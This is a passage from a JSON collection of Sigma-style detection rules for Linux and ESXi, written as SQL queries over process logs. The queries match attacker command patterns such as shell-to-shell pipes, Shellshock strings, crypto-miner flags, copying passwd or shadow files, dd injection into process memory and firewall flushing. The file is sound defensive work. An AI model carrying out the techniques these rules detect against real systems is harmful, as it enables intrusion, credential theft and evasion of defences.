            "SELECT * FROM logs WHERE ((Image LIKE '%/yum' ESCAPE '\\' AND (CommandLine LIKE '%erase%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\')) OR ((Image LIKE '%/apt' ESCAPE '\\' OR Image LIKE '%/apt-get' ESCAPE '\\') AND (CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%purge%' ESCAPE '\\')) OR (Image LIKE '%/dpkg' ESCAPE '\\' AND (CommandLine LIKE '%--remove %' ESCAPE '\\' OR CommandLine LIKE '% -r %' ESCAPE '\\')) OR (Image LIKE '%/rpm' ESCAPE '\\' AND CommandLine LIKE '% -e %' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_remove_package.yml"
    },
    {
        "title": "Potentially Suspicious Named Pipe Created Via Mkfifo",
        "id": "999c3b12-0a8c-40b6-8e13-dd7d62b75c7a",
        "description": "Detects the creation of a new named pipe using the \"mkfifo\" utility in a potentially suspicious location",
        "author": "Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.execution"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/mkfifo' ESCAPE '\\' AND CommandLine LIKE '% /tmp/%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml"
    },
    {
        "title": "Shell Execution Of Process Located In Tmp Directory",
        "id": "2fade0b6-7423-4835-9d4f-335b39b83867",
        "description": "Detects execution of shells from a parent process located in a temporary (/tmp) directory",
        "author": "Joseliyo Sanchez, @Joseliyo_Jstnk",
        "tags": [
            "attack.execution"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (ParentImage LIKE '/tmp/%' ESCAPE '\\' AND (Image LIKE '%/bash' ESCAPE '\\' OR Image LIKE '%/csh' ESCAPE '\\' OR Image LIKE '%/dash' ESCAPE '\\' OR Image LIKE '%/fish' ESCAPE '\\' OR Image LIKE '%/ksh' ESCAPE '\\' OR Image LIKE '%/sh' ESCAPE '\\' OR Image LIKE '%/zsh' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml"
    },
    {
        "title": "Flush Iptables Ufw Chain",
        "id": "3be619f4-d9ec-4ea8-a173-18fdd01996ab",
        "description": "Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic",
        "author": "Joseliyo Sanchez, @Joseliyo_Jstnk",
        "tags": [
            "attack.defense-evasion",
            "attack.t1562.004"
        ],
        "falsepositives": [
            "Network administrators"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE ((Image LIKE '%/iptables' ESCAPE '\\' OR Image LIKE '%/xtables-legacy-multi' ESCAPE '\\' OR Image LIKE '%/iptables-legacy-multi' ESCAPE '\\' OR Image LIKE '%/ip6tables' ESCAPE '\\' OR Image LIKE '%/ip6tables-legacy-multi' ESCAPE '\\') AND (CommandLine LIKE '%-F%' ESCAPE '\\' OR CommandLine LIKE '%-Z%' ESCAPE '\\' OR CommandLine LIKE '%-X%' ESCAPE '\\') AND (CommandLine LIKE '%ufw-logging-deny%' ESCAPE '\\' OR CommandLine LIKE '%ufw-logging-allow%' ESCAPE '\\' OR CommandLine LIKE '%ufw6-logging-deny%' ESCAPE '\\' OR CommandLine LIKE '%ufw6-logging-allow%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_iptables_flush_ufw.yml"
    },
    {
        "title": "Potential Discovery Activity Using Find - Linux",
        "id": "8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf",
        "description": "Detects usage of \"find\" binary in a suspicious manner to perform discovery",
        "author": "Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.discovery",
            "attack.t1083"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/find' ESCAPE '\\' AND (CommandLine LIKE '%-perm -4000%' ESCAPE '\\' OR CommandLine LIKE '%-perm -2000%' ESCAPE '\\' OR CommandLine LIKE '%-perm 0777%' ESCAPE '\\' OR CommandLine LIKE '%-perm -222%' ESCAPE '\\' OR CommandLine LIKE '%-perm -o w%' ESCAPE '\\' OR CommandLine LIKE '%-perm -o x%' ESCAPE '\\' OR CommandLine LIKE '%-perm -u=s%' ESCAPE '\\' OR CommandLine LIKE '%-perm -g=s%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_susp_find_execution.yml"
    },
    {
        "title": "Shell Execution via Find - Linux",
        "id": "6adfbf8f-52be-4444-9bac-81b539624146",
        "description": "Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.\n",
        "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)",
        "tags": [
            "attack.discovery",
            "attack.t1083"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/find' ESCAPE '\\' AND CommandLine LIKE '% . %' ESCAPE '\\' AND CommandLine LIKE '%-exec%' ESCAPE '\\' AND (CommandLine LIKE '%/bin/bash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/dash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/fish%' ESCAPE '\\' OR CommandLine LIKE '%/bin/sh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/zsh%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_find_shell_execution.yml"
    },
    {
        "title": "ESXi VSAN Information Discovery Via ESXCLI",
        "id": "d54c2f06-aca9-4e2b-81c9-5317858f4b79",
        "description": "Detects execution of the \"esxcli\" command with the \"vsan\" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.",
        "author": "Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon",
        "tags": [
            "attack.discovery",
            "attack.t1033",
            "attack.t1007"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/esxcli' ESCAPE '\\' AND CommandLine LIKE '%vsan%' ESCAPE '\\' AND (CommandLine LIKE '% get%' ESCAPE '\\' OR CommandLine LIKE '% list%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_esxcli_vsan_discovery.yml"
    },
    {
        "title": "Security Software Discovery - Linux",
        "id": "c9d8b7fd-78e4-44fe-88f6-599135d46d60",
        "description": "Detects usage of system utilities (only grep and egrep for now) to discover security software discovery",
        "author": "Daniil Yugoslavskiy, oscd.community",
        "tags": [
            "attack.discovery",
            "attack.t1518.001"
        ],
        "falsepositives": [
            "Legitimate activities"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE ((Image LIKE '%/grep' ESCAPE '\\' OR Image LIKE '%/egrep' ESCAPE '\\') AND (CommandLine LIKE '%nessusd%' ESCAPE '\\' OR CommandLine LIKE '%td-agent%' ESCAPE '\\' OR CommandLine LIKE '%packetbeat%' ESCAPE '\\' OR CommandLine LIKE '%filebeat%' ESCAPE '\\' OR CommandLine LIKE '%auditbeat%' ESCAPE '\\' OR CommandLine LIKE '%osqueryd%' ESCAPE '\\' OR CommandLine LIKE '%cbagentd%' ESCAPE '\\' OR CommandLine LIKE '%falcond%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_security_software_discovery.yml"
    },
    {
        "title": "Download File To Potentially Suspicious Directory Via Wget",
        "id": "cf610c15-ed71-46e1-bdf8-2bd1a99de6c4",
        "description": "Detects the use of wget to download content to a suspicious directory",
        "author": "Joseliyo Sanchez, @Joseliyo_Jstnk",
        "tags": [
            "attack.command-and-control",
            "attack.t1105"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/wget' ESCAPE '\\' AND (CommandLine REGEXP '\\s-O\\s' OR CommandLine LIKE '%--output-document%' ESCAPE '\\') AND CommandLine LIKE '%/tmp/%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_wget_download_suspicious_directory.yml"
    },
    {
        "title": "Ufw Force Stop Using Ufw-Init",
        "id": "84c9e83c-599a-458a-a0cb-0ecce44e807a",
        "description": "Detects attempts to force stop the ufw using ufw-init",
        "author": "Joseliyo Sanchez, @Joseliyo_Jstnk",
        "tags": [
            "attack.defense-evasion",
            "attack.t1562.004"
        ],
        "falsepositives": [
            "Network administrators"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE ((CommandLine LIKE '%-ufw-init%' ESCAPE '\\' AND CommandLine LIKE '%force-stop%' ESCAPE '\\') OR (CommandLine LIKE '%ufw%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_disable_ufw.yml"
    },
    {
        "title": "Potential Linux Process Code Injection Via DD Utility",
        "id": "4cad6c64-d6df-42d6-8dae-eb78defdc415",
        "description": "Detects the injection of code by overwriting the memory map of a Linux process using the \"dd\" Linux command.",
        "author": "Joseph Kamau",
        "tags": [
            "attack.defense-evasion",
            "attack.t1055.009"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/dd' ESCAPE '\\' AND CommandLine LIKE '%of=%' ESCAPE '\\' AND CommandLine LIKE '%/proc/%' ESCAPE '\\' AND CommandLine LIKE '%/mem%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_dd_process_injection.yml"
    },
    {
        "title": "Copy Passwd Or Shadow From TMP Path",
        "id": "fa4aaed5-4fe0-498d-bbc0-08e3346387ba",
        "description": "Detects when the file \"passwd\" or \"shadow\" is copied from tmp path",
        "author": "Joseliyo Sanchez, @Joseliyo_Jstnk",
        "tags": [
            "attack.credential-access",
            "attack.t1552.001"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/cp' ESCAPE '\\' AND CommandLine LIKE '%/tmp/%' ESCAPE '\\' AND (CommandLine LIKE '%passwd%' ESCAPE '\\' OR CommandLine LIKE '%shadow%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_cp_passwd_or_shadow_tmp.yml"
    },
    {
        "title": "ESXi VM List Discovery Via ESXCLI",
        "id": "5f1573a7-363b-4114-9208-ad7a61de46eb",
        "description": "Detects execution of the \"esxcli\" command with the \"vm\" flag in order to retrieve information about the installed VMs.",
        "author": "Cedric Maurugeon",
        "tags": [
            "attack.discovery",
            "attack.t1033",
            "attack.t1007"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/esxcli' ESCAPE '\\' AND CommandLine LIKE '%vm process%' ESCAPE '\\' AND CommandLine LIKE '% list' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_esxcli_vm_discovery.yml"
    },
    {
        "title": "Potential Suspicious Change To Sensitive/Critical Files",
        "id": "86157017-c2b1-4d4a-8c33-93b8e67e4af4",
        "description": "Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system.",
        "author": "@d4ns4n_ (Wuerth-Phoenix)",
        "tags": [
            "attack.impact",
            "attack.t1565.001"
        ],
        "falsepositives": [
            "Some false positives are to be expected on user or administrator machines. Apply additional filters as needed."
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE ((((Image LIKE '%/cat' ESCAPE '\\' OR Image LIKE '%/echo' ESCAPE '\\' OR Image LIKE '%/grep' ESCAPE '\\' OR Image LIKE '%/head' ESCAPE '\\' OR Image LIKE '%/more' ESCAPE '\\' OR Image LIKE '%/tail' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\') OR (Image LIKE '%/emacs' ESCAPE '\\' OR Image LIKE '%/nano' ESCAPE '\\' OR Image LIKE '%/sed' ESCAPE '\\' OR Image LIKE '%/vi' ESCAPE '\\' OR Image LIKE '%/vim' ESCAPE '\\')) AND (CommandLine LIKE '%/bin/login%' ESCAPE '\\' OR CommandLine LIKE '%/bin/passwd%' ESCAPE '\\' OR CommandLine LIKE '%/boot/%' ESCAPE '\\' OR CommandLine LIKE '%/etc/%.conf%' ESCAPE '\\' OR CommandLine LIKE '%/etc/cron.%' ESCAPE '\\' OR CommandLine LIKE '%/etc/crontab%' ESCAPE '\\' OR CommandLine LIKE '%/etc/hosts%' ESCAPE '\\' OR CommandLine LIKE '%/etc/init.d%' ESCAPE '\\' OR CommandLine LIKE '%/etc/sudoers%' ESCAPE '\\' OR CommandLine LIKE '%/opt/bin/%' ESCAPE '\\' OR CommandLine LIKE '%/sbin%' ESCAPE '\\' OR CommandLine LIKE '%/usr/bin/%' ESCAPE '\\' OR CommandLine LIKE '%/usr/local/bin/%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_susp_sensitive_file_access.yml"
    },
    {
        "title": "Scheduled Task/Job At",
        "id": "d2d642d7-b393-43fe-bae4-e81ed5915c4b",
        "description": "Detects the use of at/atd which are utilities that are used to schedule tasks.\nThey are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code\n",
        "author": "Ömer Günal, oscd.community",
        "tags": [
            "attack.persistence",
            "attack.t1053.002"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/at' ESCAPE '\\' OR Image LIKE '%/atd' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_at_command.yml"
    },
    {
        "title": "System Network Connections Discovery - Linux",
        "id": "4c519226-f0cd-4471-bd2f-6fbb2bb68a79",
        "description": "Detects usage of system utilities to discover system network connections",
        "author": "Daniil Yugoslavskiy, oscd.community",
        "tags": [
            "attack.discovery",
            "attack.t1049"
        ],
        "falsepositives": [
            "Legitimate activities"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE ((Image LIKE '%/who' ESCAPE '\\' OR Image LIKE '%/w' ESCAPE '\\' OR Image LIKE '%/last' ESCAPE '\\' OR Image LIKE '%/lsof' ESCAPE '\\' OR Image LIKE '%/netstat' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE '%/usr/bin/landscape-sysinfo%' ESCAPE '\\' AND Image LIKE '%/who' ESCAPE '\\')))"
        ],
        "filename": "proc_creation_lnx_system_network_connections_discovery.yml"
    },
    {
        "title": "Linux Shell Pipe to Shell",
        "id": "880973f3-9708-491c-a77b-2a35a1921158",
        "description": "Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell",
        "author": "Florian Roth (Nextron Systems)",
        "tags": [
            "attack.defense-evasion",
            "attack.t1140"
        ],
        "falsepositives": [
            "Legitimate software that uses these patterns"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE ((CommandLine LIKE 'sh -c %' ESCAPE '\\' OR CommandLine LIKE 'bash -c %' ESCAPE '\\') AND ((CommandLine LIKE '%| bash %' ESCAPE '\\' OR CommandLine LIKE '%| sh %' ESCAPE '\\' OR CommandLine LIKE '%|bash %' ESCAPE '\\' OR CommandLine LIKE '%|sh %' ESCAPE '\\') OR (CommandLine LIKE '%| bash' ESCAPE '\\' OR CommandLine LIKE '%| sh' ESCAPE '\\' OR CommandLine LIKE '%|bash' ESCAPE '\\' OR CommandLine LIKE '% |sh' ESCAPE '\\')))"
        ],
        "filename": "proc_creation_lnx_susp_pipe_shell.yml"
    },
    {
        "title": "Touch Suspicious Service File",
        "id": "31545105-3444-4584-bebf-c466353230d2",
        "description": "Detects usage of the \"touch\" process in service file.",
        "author": "Joseliyo Sanchez, @Joseliyo_Jstnk",
        "tags": [
            "attack.defense-evasion",
            "attack.t1070.006"
        ],
        "falsepositives": [
            "Admin changing date of files."
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/touch' ESCAPE '\\' AND CommandLine LIKE '% -t %' ESCAPE '\\' AND CommandLine LIKE '%.service' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_touch_susp.yml"
    },
    {
        "title": "Linux Webshell Indicators",
        "id": "818f7b24-0fba-4c49-a073-8b755573b9c7",
        "description": "Detects suspicious sub processes of web server processes",
        "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.persistence",
            "attack.t1505.003"
        ],
        "falsepositives": [
            "Web applications that invoke Linux command line tools"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (((ParentImage LIKE '%/httpd' ESCAPE '\\' OR ParentImage LIKE '%/lighttpd' ESCAPE '\\' OR ParentImage LIKE '%/nginx' ESCAPE '\\' OR ParentImage LIKE '%/apache2' ESCAPE '\\' OR ParentImage LIKE '%/node' ESCAPE '\\' OR ParentImage LIKE '%/caddy' ESCAPE '\\') OR (ParentCommandLine LIKE '%/bin/java%' ESCAPE '\\' AND ParentCommandLine LIKE '%tomcat%' ESCAPE '\\') OR (ParentCommandLine LIKE '%/bin/java%' ESCAPE '\\' AND ParentCommandLine LIKE '%websphere%' ESCAPE '\\')) AND (Image LIKE '%/whoami' ESCAPE '\\' OR Image LIKE '%/ifconfig' ESCAPE '\\' OR Image LIKE '%/ip' ESCAPE '\\' OR Image LIKE '%/bin/uname' ESCAPE '\\' OR Image LIKE '%/bin/cat' ESCAPE '\\' OR Image LIKE '%/bin/crontab' ESCAPE '\\' OR Image LIKE '%/hostname' ESCAPE '\\' OR Image LIKE '%/iptables' ESCAPE '\\' OR Image LIKE '%/netstat' ESCAPE '\\' OR Image LIKE '%/pwd' ESCAPE '\\' OR Image LIKE '%/route' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_webshell_detection.yml"
    },
    {
        "title": "Linux Remote System Discovery",
        "id": "11063ec2-de63-4153-935e-b1a8b9e616f1",
        "description": "Detects the enumeration of other remote systems.",
        "author": "Alejandro Ortuno, oscd.community",
        "tags": [
            "attack.discovery",
            "attack.t1018"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE ((Image LIKE '%/arp' ESCAPE '\\' AND CommandLine LIKE '%-a%' ESCAPE '\\') OR (Image LIKE '%/ping' ESCAPE '\\' AND (CommandLine LIKE '% 10.%' ESCAPE '\\' OR CommandLine LIKE '% 192.168.%' ESCAPE '\\' OR CommandLine LIKE '% 172.16.%' ESCAPE '\\' OR CommandLine LIKE '% 172.17.%' ESCAPE '\\' OR CommandLine LIKE '% 172.18.%' ESCAPE '\\' OR CommandLine LIKE '% 172.19.%' ESCAPE '\\' OR CommandLine LIKE '% 172.20.%' ESCAPE '\\' OR CommandLine LIKE '% 172.21.%' ESCAPE '\\' OR CommandLine LIKE '% 172.22.%' ESCAPE '\\' OR CommandLine LIKE '% 172.23.%' ESCAPE '\\' OR CommandLine LIKE '% 172.24.%' ESCAPE '\\' OR CommandLine LIKE '% 172.25.%' ESCAPE '\\' OR CommandLine LIKE '% 172.26.%' ESCAPE '\\' OR CommandLine LIKE '% 172.27.%' ESCAPE '\\' OR CommandLine LIKE '% 172.28.%' ESCAPE '\\' OR CommandLine LIKE '% 172.29.%' ESCAPE '\\' OR CommandLine LIKE '% 172.30.%' ESCAPE '\\' OR CommandLine LIKE '% 172.31.%' ESCAPE '\\' OR CommandLine LIKE '% 127.%' ESCAPE '\\' OR CommandLine LIKE '% 169.254.%' ESCAPE '\\')))"
        ],
        "filename": "proc_creation_lnx_remote_system_discovery.yml"
    },
    {
        "title": "Cat Sudoers",
        "id": "0f79c4d2-4e1f-4683-9c36-b5469a665e06",
        "description": "Detects the execution of a cat /etc/sudoers to list all users that have sudo rights",
        "author": "Florian Roth (Nextron Systems)",
        "tags": [
            "attack.reconnaissance",
            "attack.t1592.004"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE ((Image LIKE '%/cat' ESCAPE '\\' OR Image LIKE '%grep' ESCAPE '\\' OR Image LIKE '%/head' ESCAPE '\\' OR Image LIKE '%/tail' ESCAPE '\\' OR Image LIKE '%/more' ESCAPE '\\') AND CommandLine LIKE '% /etc/sudoers%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_cat_sudoers.yml"
    },
    {
        "title": "ESXi Admin Permission Assigned To Account Via ESXCLI",
        "id": "9691f58d-92c1-4416-8bf3-2edd753ec9cf",
        "description": "Detects execution of the \"esxcli\" command with the \"system\" and \"permission\" flags in order to assign admin permissions to an account.",
        "author": "Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.execution"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/esxcli' ESCAPE '\\' AND CommandLine LIKE '%system%' ESCAPE '\\' AND CommandLine LIKE '% permission %' ESCAPE '\\' AND CommandLine LIKE '% set%' ESCAPE '\\' AND CommandLine LIKE '%Admin%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_esxcli_permission_change_admin.yml"
    },
    {
        "title": "Shell Execution GCC  - Linux",
        "id": "9b5de532-a757-4d70-946c-1f3e44f48b4d",
        "description": "Detects the use of the \"gcc\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\n",
        "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)",
        "tags": [
            "attack.discovery",
            "attack.t1083"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE ((Image LIKE '%/c89' ESCAPE '\\' OR Image LIKE '%/c99' ESCAPE '\\' OR Image LIKE '%/gcc' ESCAPE '\\') AND CommandLine LIKE '%-wrapper%' ESCAPE '\\' AND (CommandLine LIKE '%/bin/bash,-s%' ESCAPE '\\' OR CommandLine LIKE '%/bin/dash,-s%' ESCAPE '\\' OR CommandLine LIKE '%/bin/fish,-s%' ESCAPE '\\' OR CommandLine LIKE '%/bin/sh,-s%' ESCAPE '\\' OR CommandLine LIKE '%/bin/zsh,-s%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_gcc_shell_execution.yml"
    },
    {
        "title": "Decode Base64 Encoded Text",
        "id": "e2072cab-8c9a-459b-b63c-40ae79e27031",
        "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text",
        "author": "Daniil Yugoslavskiy, oscd.community",
        "tags": [
            "attack.defense-evasion",
            "attack.t1027"
        ],
        "falsepositives": [
            "Legitimate activities"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/base64' ESCAPE '\\' AND CommandLine LIKE '%-d%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_base64_decode.yml"
    },
    {
        "title": "File Deletion",
        "id": "30aed7b6-d2c1-4eaf-9382-b6bc43e50c57",
        "description": "Detects file deletion using \"rm\", \"shred\" or \"unlink\" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity",
        "author": "Ömer Günal, oscd.community",
        "tags": [
            "attack.defense-evasion",
            "attack.t1070.004"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "informational",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/rm' ESCAPE '\\' OR Image LIKE '%/shred' ESCAPE '\\' OR Image LIKE '%/unlink' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_file_deletion.yml"
    },
    {
        "title": "Potentially Suspicious Execution From Tmp Folder",
        "id": "312b42b1-bded-4441-8b58-163a3af58775",
        "description": "Detects a potentially suspicious execution of a process located in the '/tmp/' folder",
        "author": "Joseliyo Sanchez, @Joseliyo_Jstnk",
        "tags": [
            "attack.defense-evasion",
            "attack.t1036"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE Image LIKE '/tmp/%' ESCAPE '\\'"
        ],
        "filename": "proc_creation_lnx_susp_execution_tmp_folder.yml"
    },
    {
        "title": "Enable BPF Kprobes Tracing",
        "id": "7692f583-bd30-4008-8615-75dab3f08a99",
        "description": "Detects common command used to enable bpf kprobes tracing",
        "author": "Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.execution",
            "attack.defense-evasion"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (CommandLine LIKE '%echo 1 >%' ESCAPE '\\' AND CommandLine LIKE '%/sys/kernel/debug/tracing/events/kprobes/%' ESCAPE '\\' AND (CommandLine LIKE '%/myprobe/enable%' ESCAPE '\\' OR CommandLine LIKE '%/myretprobe/enable%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_bpf_kprob_tracing_enabled.yml"
    },
    {
        "title": "Linux Crypto Mining Indicators",
        "id": "9069ea3c-b213-4c52-be13-86506a227ab1",
        "description": "Detects command line parameters or strings often used by crypto miners",
        "author": "Florian Roth (Nextron Systems)",
        "tags": [
            "attack.impact",
            "attack.t1496"
        ],
        "falsepositives": [
            "Legitimate use of crypto miners"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%sh -c /sbin/modprobe msr allow\\_writes=on%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_crypto_mining.yml"
    },
    {
        "title": "Nohup Execution",
        "id": "e4ffe466-6ff8-48d4-94bd-e32d1a6061e2",
        "description": "Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments",
        "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io",
        "tags": [
            "attack.execution",
            "attack.t1059.004"
        ],
        "falsepositives": [
            "Administrators or installed processes that leverage nohup"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE Image LIKE '%/nohup' ESCAPE '\\'"
        ],
        "filename": "proc_creation_lnx_nohup.yml"
    },
    {
        "title": "ESXi Account Creation Via ESXCLI",
        "id": "b28e4eb3-8bbc-4f0c-819f-edfe8e2f25db",
        "description": "Detects user account creation on ESXi system via esxcli",
        "author": "Cedric Maurugeon",
        "tags": [
            "attack.persistence",
            "attack.t1136"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/esxcli' ESCAPE '\\' AND CommandLine LIKE '%system %' ESCAPE '\\' AND CommandLine LIKE '%account %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_esxcli_user_account_creation.yml"
    },
    {
        "title": "Chmod Suspicious Directory",
        "id": "6419afd1-3742-47a5-a7e6-b50386cd15f8",
        "description": "Detects chmod targeting files in abnormal directory paths.",
        "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io",
        "tags": [
            "attack.defense-evasion",
            "attack.t1222.002"
        ],
        "falsepositives": [
            "Admin changing file permissions."
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/chmod' ESCAPE '\\' AND (CommandLine LIKE '%/tmp/%' ESCAPE '\\' OR CommandLine LIKE '%/.Library/%' ESCAPE '\\' OR CommandLine LIKE '%/etc/%' ESCAPE '\\' OR CommandLine LIKE '%/opt/%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_susp_chmod_directories.yml"
    },
    {
        "title": "Shellshock Expression",
        "id": "c67e0c98-4d39-46ee-8f6b-437ebf6b950e",
        "description": "Detects shellshock expressions in log files",
        "author": "Florian Roth (Nextron Systems)",
        "tags": [
            "attack.persistence",
            "attack.t1505.003"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (logs MATCH ('\"(){:;};\" OR \"() {:;};\" OR \"() { :;};\" OR \"() { :; };\"'))"
        ],
        "filename": "lnx_shellshock.yml"
    },
    {
        "title": "Sudo Privilege Escalation CVE-2019-14287 - Builtin",
        "id": "7fcc54cb-f27d-4684-84b7-436af096f858",
        "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287",
        "author": "Florian Roth (Nextron Systems)",
        "tags": [
            "attack.privilege-escalation",
            "attack.t1068",
            "attack.t1548.003",
            "cve.2019-14287"
        ],
        "falsepositives": [
            "Unlikely"
        ],
        "level": "critical",
        "rule": [
